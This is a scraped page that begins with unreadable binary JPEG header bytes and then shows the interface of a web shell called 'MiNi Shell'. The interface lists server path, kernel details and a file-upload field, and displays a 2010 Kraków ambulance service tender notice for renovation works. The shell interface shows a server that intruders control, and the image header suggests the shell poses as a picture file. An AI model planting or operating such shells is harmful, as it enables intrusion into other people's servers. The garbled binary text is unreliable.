JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100921/299446-N-2010.html

<p class="kh_header"><b>Kraków: Remont pomieszczeń w celu dostosowania na miejsce stacjonowania 
Zespołów Ratownictwa Medycznego</b><br>
<b>Numer ogłoszenia: 299446 - 2010; data zamieszczenia: 21.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krakowskie Pogotowie Ratunkowe , ul. Łazarza 14, 31-530 Kraków, woj. małopolskie, tel. 012 4244200, faks 012 4244300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpr.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń w celu dostosowania na miejsce stacjonowania 
Zespołów Ratownictwa Medycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Remont pomieszczeń w celu dostosowania na miejsce stacjonowania Zespołów Ratownictwa Medycznego:, obejmujący w szczególności:
1.	Remont pomieszczeń o powierzchni 173,05m2  znajdujących się w budynku głównym, segmencie A 3 ,poziomie -1 Szpitala im. Rydygiera w Krakowie, 
2.	Przystosowanie terenu obecnego chodnika oraz części zieleńca na terenie posesji Szpitala im. Rydygiera o powierzchni 75m2 na  funkcję zielonego  parkingu dla parkowania karetek wraz z wykonaniem dwóch skrzynek elektrycznych zasilających karetki.
3.	Remont bramy łączącej drogę z zielonego parkingu  z ulicą Mikołajczyka wraz z montażem siłowników do automatycznego otwierania za pomocą pilotów i szyfratora.

Krakowskie Pogotowie Ratunkowe posiada tytuł prawny do dysponowania przedmiotem zamówienia na podstawie umowy dzierżawy.

Szczegółowy zakres przedmiotu zamówienia został określony w :
1)	przedmiarze robót stanowiącym załącznik  nr 4  do niniejszej SIWZ ,
2)	projekcie technicznym branży elektrycznej, stanowiącym załącznik nr 5 do SIWZ,
3)	projekcie technicznym branży wodno-kanalizacyjnej i wentylacyjnej stanowiącym załącznik nr 6 do SIWZ,
4)	rysunkach  ( rzut pomieszczeń istniejących oraz rzut pomieszczeń po remoncie)
stanowiących załączniki nr 7 i nr 8 do  niniejszej SIWZ.

Wymienione prace zostaną wykonane przy zastosowaniu materiałów dostarczonych przez Wykonawcę.
Zastosowane materiały i urządzenia powinny odpowiadać wymaganiom polskich norm, aprobat technicznych wydanych przez Instytut Techniki Budowlanej lub posiadać wymagane atesty.
 Po realizacji zamówienia Wykonawca dokona niezbędnych pomiarów elektrycznych i przedstawi je Zamawiającemu wraz ze zgłoszeniem gotowości odbioru przedmiotu zamówienia.

1.	Nie dopuszcza się składania ofert częściowych
2.	Oferty nie zawierające pełnego zakresu przedmiotu zamówienia zostaną odrzucone.
3.	Nie przewiduje się zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt.6 i 7.
4.	Nie dopuszcza się składania ofert wariantowych.
5.	Zamawiający nie przewiduje prowadzenia aukcji elektronicznej.
6.	Zamawiający nie przewiduje prowadzenia dynamicznego systemu zakupów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3, 45.33.20.00-3, 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta winna być zabezpieczona wadium w  wysokości :
a)	  4 000,00 PLN 
2.	Przy wnoszeniu wadium Wykonawca winien podać  numer i nazwę postępowania .
3.	Termin wnoszenia wadium upływa wraz z upływem terminu składania ofert tj. dnia 07.10.2010 r. do godz. 12:00 - (decyduje termin uznania rachunku bankowego Zamawiającego).
4.	Wadium może być wnoszone :
a)	w pieniądzu, przelewem na konto Krakowskiego Pogotowia Ratunkowego:
PKO Bank Polski Regionalny Oddział w Krakowie
Nr 92 1020 2892 0000 5902 0185 8430
b)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych, 
d)	w gwarancjach ubezpieczeniowych,
e)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zmianami).
5.	Wadium wnoszone w formie: poręczenia bankowego, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach, 
o których mowa w pkt. 4 lit. e) należy złożyć w formie oryginału, w oddzielnej [nie w tej samej kopercie co oferta] , opisanej zgodnie z pkt. X.11. siwz kopercie, w terminie określonym w pkt. VIII. 3, pod adresem podanym w pkt. XI.1. SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana w oparciu 
o dokumenty, o których mowa w pkt VI. SIWZ zgodnie z formułą : spełnia , nie spełnia dla każdego 
z dokumentów: :  Oświadczenie Wykonawcy nr 1 pkt. 1, (według wzoru stanowiącego załącznik nr 1 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana w oparciu 
o dokumenty, o których mowa w pkt VI. SIWZ zgodnie z formułą : spełnia , nie spełnia dla każdego 
z dokumentów:
a)	Oświadczenie Wykonawcy nr 1, pkt. 2, (według wzoru stanowiącego załącznik nr 1 do SIWZ);
b)	wykaz robót budowlanych- min. dwóch - odpowiadających swym rodzajem i jednostkową wartością co najmniej zadaniu stanowiącemu przedmiot zamówienia ( kwocie brutto nie mniejszej niż 250 000zl.),  wykonanych w okresie ostatnich  pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem wartości, daty i miejsca wykonania  wg wzoru określonego w Tabeli nr 1 oraz 
c)	załączenie dokumentów (przynajmniej dwóch) potwierdzających, że poszczególne, ww roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.           
TABELA NR 1 -  ROBOTY  ZREALIZOWANE
Lp.	RODZAJ ROBOT BUDOWLANYCH	WARTOŚĆ  ROBÓT BUDOWLANYCH	DATA
WYKONANIA	MIEJSCE WYKONANIA
1.				
2.				
3.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana w oparciu 
o dokumenty, o których mowa w pkt VI. SIWZ zgodnie z formułą : spełnia , nie spełnia dla każdego 
z dokumentów:
a)	Oświadczenie Wykonawcy nr 1 pkt. 3, (według wzoru stanowiącego załącznik nr 1 do SIWZ);
b)	Wykaz narzędzi i urządzeń  dostępnych wykonawcy w celu realizacji zamówienia wg wzoru określonego w  Tabeli nr 3
 
Tabela nr 3 -  Wykaz narzędzi i urządzeń
Lp.	Nazwa	Wymagana
ilość 	Informacja  o podstawie do dysponowania urządzeniami  
(wpisać dysponuję* lub 
polegam na zasobach innych podmiotów *)
1.	Koparka gąsiennicowa	1	
Jeśli Wykonawca polega to w tej komórce należy wpisać :
Pisemne zobowiązanie podmiotu w załączeniu  
i załączyć takie zobowiązanie.
2.	Rozkładarka mas bitumicznych	1	
Jeśli Wykonawca polega to w tej komórce należy wpisać :
Pisemne zobowiązanie podmiotu w załączeniu  
i załączyć takie zobowiązanie.
3.	Równiarka samojezdna	1	Jeśli Wykonawca polega to w tej komórce należy wpisać :
Pisemne zobowiązanie podmiotu w załączeniu 
i załączyć takie zobowiązanie
4.	Spycharka gąsiennicowa	1	Jeśli Wykonawca polega to w tej komórce należy wpisać :
Pisemne zobowiązanie podmiotu w załączeniu 
i załączyć takie zobowiązanie
5.	Walec statyczny samojezdny	1	Jeśli Wykonawca polega to w tej komórce należy wpisać :
Pisemne zobowiązanie podmiotu w załączeniu  
i załączyć takie zobowiązanie
6.	Walec samojezdny wibracyjny	1	Jeśli Wykonawca polega to w tej komórce należy wpisać :
Pisemne zobowiązanie podmiotu w załączeniu  
i załączyć takie zobowiązanie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana w oparciu 
o dokumenty, o których mowa w pkt VI. SIWZ zgodnie z formułą : spełnia , nie spełnia dla każdego 
z dokumentów:a)	Oświadczenie Wykonawcy nr 1 pkt. 3 (według wzoru stanowiącego załącznik nr 1 do SIWZ);
b)	wykaz osób ,które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami o ich kwalifikacjach - wg wzoru określonego w Tabeli nr 2.

TABELA NR 2 -  Wykaz osób 
Lp.	Osoba - funkcja 
Wpisać imię i nazwisko	Wymagana
ilość osób	Wymagane 
kwalifikacje
( należy dołączyć dokument potwierdzający)	Informacja  o podstawie do dysponowania osobami 
(wpisać dysponuję* lub 
polegam na zasobach innych podmiotów *)
1.	Kierownik budowy 	1	Uprawnienia  do  kierowania, nadzorowania 
i kontrolowania budowy dla osoby będącej kierownikiem budowy	
Jeśli Wykonawca polega to w tej komórce należy wpisać :Pisemne zobowiązanie podmiotu w załączeniu  
i załączyć takie zobowiązanie.
2.	Pracownicy 
Wykonujący roboty w zakresie instalacji elektrycznych	min. 2	Uprawnienia  - Świadectwo kwalifikacyjne do wykonywania prac elektrycznych do 1kV wystawione przez 
SPE ( Stowarzyszenie Polskich Energetyków	
Jeśli Wykonawca polega to w tej komórce należy wpisać :Pisemne zobowiązanie podmiotu w załączeniu 
i załączyć takie zobowiązanie.
3.	Monter instalacji sanitarnych 	min. 1	Uprawnienia do instalacji sieci zewnętrznych	Jeśli Wykonawca  polega to w tej komórce należy wpisać :
Pisemne zobowiązanie podmiotu w załączeniu  
i załączyć takie zobowiązanie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Ocena spełniania warunków udziału w postępowaniu wykonawców zostanie dokonana w oparciu 
o dokumenty, o których mowa w pkt VI. SIWZ zgodnie z formułą : spełnia , nie spełnia dla każdego 
z dokumentów:
a)	Oświadczenie Wykonawcy nr 1, pkt. 4 (według wzoru stanowiącego załącznik nr 1 do siwz),
b)	opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia , na kwotę ( sumę gwarancyjną) nie mniejszą niż 250 000zł.
c)	informacja z bank,/ów lub spółdzielczej kasy oszczędnościowo-kredytowej , w których wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową na kwotę nie mniejszą niż 250 000zł., wystawiona nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.
d)	jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, wymaga się przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których te podmioty posiadają rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową podmiotu, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wartość tych środków nie może być mniejsza niż  250 000 zł .  (§1 ust.3 Rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009 r. Dz.U. z 2009 r. nr 226,poz 1817),
e)	jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego  w pkt. VI.1.4) c) niniejszej SIWZ warunku. (art.26 uzt.2c ustawy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę 
w postępowaniu o udzielenie zamówienia publicznego nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej.

2)	jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca w takiej sytuacji zobowiązany jest złożyć pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art.26 ust.2b ustawy).   

3)	wypełniony Przedmiar robót stanowiący załączniki nr 4 do niniejszej SIWZ .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana terminu realizacji za skutek wystąpienia siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpr.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Krakowskie Pogotowie Ratunkowe, 31-530 Kraków, ul. Łazarza 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2010 godzina 12:00, miejsce: Krakowskie Pogotowie Ratunkowe, 31-530 Kraków, ul. Łazarza 14,pok.218 Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com